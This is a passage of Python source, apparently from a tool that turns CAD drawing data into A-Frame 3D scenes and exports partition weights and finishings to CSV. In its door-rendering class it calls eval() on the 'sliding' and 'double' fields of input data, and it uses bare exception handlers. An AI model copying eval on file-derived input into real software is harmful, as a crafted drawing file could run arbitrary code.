data['segments-height']!='18': outstr += f'segments-height: {data["segments-height"]};' if data['segments-width']!='36': outstr += f'segments-width: {data["segments-width"]};' if data['theta-length']!='180': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-sphere>\n</a-entity>\n' return outstr def make_plane(page_obj, x, data): outstr = f'<a-entity id="plane-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-plane id="plane-{x}" \n' if data['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot outstr += f'position="0 {data["43"]/2} 0" \n' outstr += 'look-at="#camera-foot" \n' elif data['2'] == 'ceiling':#if it's a ceiling, correct position outstr += f'position="{data["41"]/2} {-data["43"]/2} 0" \n' else:#insertion is at corner outstr += f'position="{data["41"]/2} {data["43"]/2} 0" \n' outstr += f'width="{fabs(data["41"])}" height="{fabs(data["43"])}" \n' outstr += 'geometry="' try: if data['segments-height']!='1': outstr += f'segments-height: {data["segments-height"]};' if data['segments-width']!='1': outstr += f'segments-width: {data["segments-width"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-plane>\n</a-entity>\n' return outstr def make_text(x, data): outstr = f'<a-entity id="text-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' outstr += f'text="width: {data["41"]}; align: {data["align"]}; color: {data["color"]}; ' outstr += f'value: {data["text"]}; wrap-count: {data["wrap-count"]}; ' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n' return outstr def make_link(page_obj, x, data): outstr = f'<a-link id="link-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' outstr += f'scale="{data["41"]} {data["43"]} {data["42"]}"\n' if data['tree'] == 'parent': target = page_obj.get_parent() elif data['tree'] == 'child': target = page_obj.get_first_child() elif data['tree'] == 'previous' or data['tree'] == 'prev': target = page_obj.get_prev_sibling() else:#we default to next sibling target = page_obj.get_next_sibling() try: if target: outstr += f'href="{target.url}"\n' outstr += f'title="{data["title"]}" color="{data["color"]}" on="click"\n' eq_image = target.specific.equirectangular_image if eq_image: outstr += f'image="{eq_image.file.url}"' else: outstr += 'image="#default-sky"' outstr += '>\n' if data['animation']: outstr += is_animation(data) outstr += '</a-link>\n' return outstr else: return '' except: return '' def make_triangle(page_obj, x, data): outstr = f'<a-triangle id="triangle-{x}" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'geometry="vertexA:{data["10"]} {data["30"]} {data["20"]}; \n' outstr += f'vertexB:{data["11"]} {data["31"]} {data["21"]}; \n' outstr += f'vertexC:{data["12"]} {data["32"]} {data["22"]}" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}; ' if page_obj.double_face: outstr += 'side: double; ' outstr += '">\n</a-triangle> \n' return outstr def make_light(page_obj, x, data): outstr = f'<a-entity id="light-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' try: if data['type'] == 'ambient': outstr += f'light="type: ambient; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += '">\n' elif data['type'] == 'point': outstr += f'light="type: point; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += f'decay: {data["decay"]}; distance: {data["distance"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += '"> \n' elif data['type'] == 'spot': outstr += f'light="type: spot; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += f'decay: {data["decay"]}; distance: {data["distance"]}; ' outstr += f'angle: {data["angle"]}; penumbra: {data["penumbra"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' else:#defaults to directional outstr += f'light="type: directional; color: {data["color"]}; intensity: {data["intensity"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'shadowCameraBottom: {-5*fabs(data["42"])}; \n' outstr += f'shadowCameraLeft: {-5*fabs(data["41"])}; \n' outstr += f'shadowCameraTop: {5*fabs(data["42"])}; \n' outstr += f'shadowCameraRight: {5*fabs(data["41"])}; \n' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' except KeyError:#default if no light type is set outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; ' if page_obj.shadows: outstr += 'castShadow: true;' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n'#close light entity return outstr class APartition(object): def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None' self.type_obj = False if self.d['type']: try: self.type_obj = types.get(title = self.d['type']) except: pass self.finishings = finishings self.csv_f = csv_f def calc_weight(self): part_weight = 0 unit_weight = 0 zero_weight = 0 part_thickness = 0 fixed_thickness = True for part_layer in self.type_obj.part_layers.all(): part_layer_thickness = fabs(float(part_layer.thickness)) part_layer_weight = fabs(float(part_layer.weight)) if part_layer_thickness == 0: fixed_thickness = False zero_weight = part_layer_weight part_thickness += part_layer_thickness unit_weight += part_layer_thickness/100 * part_layer_weight unit_weight += (fabs(self.d['42']) - part_thickness/100) * zero_weight#add eventual zero thickness layer part_weight = unit_weight * fabs(self.d['41']) * fabs(self.d['43'])#actual part size if self.d['2'] == 'a-openwall': part_weight = part_weight - (unit_weight * fabs(self.d['door_off_2']-self.d['door_off_1']) * fabs(self.d['door_height']))#remove door if part_thickness and fixed_thickness and fabs(self.d['42']) != part_thickness/100: self.d['alert'] = 'Different than Partition Type' elif fabs(self.d['42']) < part_thickness/100: self.d['alert'] = 'Partition too thin' else: if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,{self.type_obj.title},{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},{part_weight},{self.d["alert"]} \n') return def no_weight(self): #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,None,{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},0,{self.d["alert"]} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' #slab handle is on top if self.d['2'] == 'a-slab': y = self.d['43'] else: y = 0 #top surface if self.d['2'] == 'a-slab': self.d['side'] = 'floor' else: self.d['side'] = 'top' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="-90 0 0"> \n' else: outstr += 'rotation="-90 180 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom surface, a-openwall has left and right bottoms if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'ceiling' else: self.d['side'] = 'bottom' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside surface, a-openwall has left, right and top insides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'front' else: self.d['side'] = 'in' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside surface, a-openwall has left, right and top outsides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'back' else: self.d['side'] = 'out' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #left surface self.d['side'] = 'left' self.d['sub_side'] = 'left' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="0 {-y} {-self.d["42"]/2}" \n' if self.d['41'] > 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #right surface self.d['side'] = 'right' self.d['sub_side'] = 'right' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]} {-y} {-self.d["42"]/2}" \n' if self.d['41'] < 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' if self.d['2'] == 'a-openwall': #bottom left surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom right surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside left surface self.d['side'] = 'in' self.d['sub_side'] = 'in-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside right surface self.d['side'] = 'in' self.d['sub_side'] = 'in-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside top surface self.d['side'] = 'in' self.d['sub_side'] = 'in-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2} {self.d["door_height"]} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside left surface self.d['side'] = 'out' self.d['sub_side'] = 'out-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside right surface self.d['side'] = 'out' self.d['sub_side'] = 'out-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside top surface self.d['side'] = 'out' self.d['sub_side'] = 'out-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2} {self.d["door_height"]} {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #end entity outstr += '</a-entity>\n' return outstr def part_simple_finishing(self): try: finishing = self.finishings.get(title = self.d[self.d['side']]) if self.d['side']=="floor": if finishing.skirting_image: part_image = 'skirting-' + finishing.title part_repeat = finishing.skirting_pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.skirting_color: part_color = finishing.skirting_color else: part_color = self.d['color'] else: if finishing.image: part_image = 'finishing-' + finishing.title part_repeat = finishing.pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.color: part_color = finishing.color else: part_color = self.d['color'] self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},-,{part_image},-,-,-,-,-,-,-,{self.d["width"]},{self.d["height"]},-,-,- \n') except: part_image = self.d['8'] part_repeat = self.d['repeat'] part_color = self.d['color'] outstr = f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {self.d["height"]/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{self.d["height"]}"\n' outstr += f'material="src: #image-{part_image}; color: {part_color}' outstr += is_repeat(part_repeat, self.d['width'], self.d['height']) outstr += '">\n</a-plane>\n' return outstr def part_striped_finishing(self): if self.d['sub_side']=='in-top' or self.d['sub_side']=='out-top': door_height = fabs(self.d['door_height'])*self.d['43']/fabs(self.d['43']) else: door_height = 0 try: finishing = self.finishings.get(title = self.d[self.d['side']]) wall_height = fabs(self.d['height']) tiling_height = fabs(float(finishing.tiling_height))/100*self.d['43']/fabs(self.d['43']) skirting_height = fabs(float(finishing.skirting_height))/100*self.d['43']/fabs(self.d['43']) if door_height > wall_height: door_height = wall_height tiling_height = wall_height skirting_height = wall_height else: if skirting_height < door_height: skirting_height = door_height if skirting_height > wall_height: skirting_height = wall_height if tiling_height < skirting_height: tiling_height = skirting_height if tiling_height > wall_height: tiling_height = wall_height wall_height = wall_height - tiling_height tiling_height = tiling_height - skirting_height skirting_height = skirting_height - door_height if finishing.image: wall_image = 'finishing-' + finishing.title wall_repeat = finishing.pattern else: wall_image = self.d['8'] wall_repeat = self.d['repeat'] if finishing.color: wall_color = finishing.color else: wall_color = self.d['color'] outstr = '' if wall_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {wall_height/2+tiling_height+skirting_height} 0" \n' outstr += f'width="{self.d["width"]}" height="{wall_height}" \n' outstr += f'material="src: #image-{wall_image}; color: {wall_color}' outstr += is_repeat(wall_repeat, self.d['width'], wall_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Wall,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{wall_height},-,-,- \n') if tiling_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-tiling" \n' outstr += f'position="0 {tiling_height/2+skirting_height} 0" \n' outstr += f'width="{self.d["width"]}" height="{tiling_height}" \n' outstr += f'material="src: #image-tiling-{finishing.title}; color: {finishing.tiling_color}' outstr += is_repeat(finishing.tiling_pattern, self.d['width'], tiling_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Tiling,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{tiling_height},-,-,- \n') if skirting_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-skirting" \n' outstr += f'position="0 {skirting_height/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{skirting_height}" \n' outstr += f'material="src: #image-skirting-{finishing.title}; color: {finishing.skirting_color}' outstr += is_repeat(finishing.skirting_pattern, self.d['width'], skirting_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Skirting,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{skirting_height},-,-,- \n') except: outstr = f'<a-plane id="except-{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {(self.d["height"]-door_height)/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{self.d["height"]-door_height}" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], self.d["width"], self.d["height"]-door_height) outstr += f'">\n</a-plane> \n' return outstr def write_html_alert(self): outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}-alert: {self.d["alert"]}" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' if self.d["2"] == 'a-openwall': outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-left" \n' outstr += f'position="{self.d["door_off_1"]/2} {self.d["door_height"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["door_off_1"])} {fabs(self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-right" \n' outstr += f'position="{(self.d["41"]-self.d["door_off_2"])/2+self.d["door_off_2"]} {self.d["door_height"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"]-self.d["door_off_2"])} {fabs(self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-top" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"] - self.d["door_height"])/2+self.d["door_height"]} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])} {fabs(self.d["43"] - self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' else: outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])} {fabs(self.d["43"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += '</a-entity>\n' return outstr class AOpening(object):#face it, this could be a APartition subclass def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None'#sets alert default self.d['frame_image'] = ''#sets frame defaults self.d['frame_pattern'] = '' self.d['frame_color'] = self.d['color'] self.type_obj = False if self.d['type']:#looks for partition type try: self.type_obj = types.get(title = self.d['type']) except: pass self.finish_obj = False if self.d['finishing']:#looks for finishing try: self.finish_obj = finishings.get(title = self.d['finishing']) except: pass self.csv_f = csv_f def has_finishing(self): #we change appearance according to finishing if self.finish_obj.tiling_image: self.d['8'] = 'tiling-' + self.finish_obj.title self.d['repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['frame_image'] = 'skirting-' + self.finish_obj.title self.d['frame_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['frame_color'] = self.finish_obj.skirting_color return def has_type(self): #we don't calculate door weight, but we change appearance accordingly to partition type if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file opening_weight = 0#by now useless self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,{self.type_obj.title},{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},{opening_weight},{self.d["alert"]} \n') return def no_type(self): #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,None,{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},0,{self.d["alert"]} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' #left frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-left-frame" \n' outstr += f'position="{-0.049*unit(self.d["41"])} {(self.d["43"]+0.099*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d["43"])+0.099} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += '</a-box>\n' #right frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-right-frame" \n' outstr += f'position="{self.d["41"]+0.049*unit(self.d["41"])} {(self.d["43"]+0.099*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d["43"])+0.099} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += '</a-box>\n' #top frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-top-frame" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]+0.049*unit(self.d["43"])} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += '</a-box>\n' if self.d["type"] == 'ghost': outstr += '</a-entity>\n' return outstr else: if eval(self.d["sliding"]): if eval(self.d["double"]): #animated slide 1 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide-1"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-(self.d["41"])/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-1" \n' outstr += f'position="{self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated slide 2 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide-2" \n' outstr += f'position="{self.d["41"]} 0 0"> \n' outstr += f'<a-animation attribute="position" from="{self.d["41"]} 0 0" to="{(self.d["41"])*3/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-2" \n' outstr += f'position="{-self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#single #animated slide outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-self.d["41"]} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#hinged if eval(self.d["double"]): #animated hinge 1 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge-1"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-1" \n' outstr += f'position="{self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated hinge 2 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge-2" ' outstr += f'position="{self.d["41"]} 0 0"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-2" \n' outstr += f'position="{-self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += 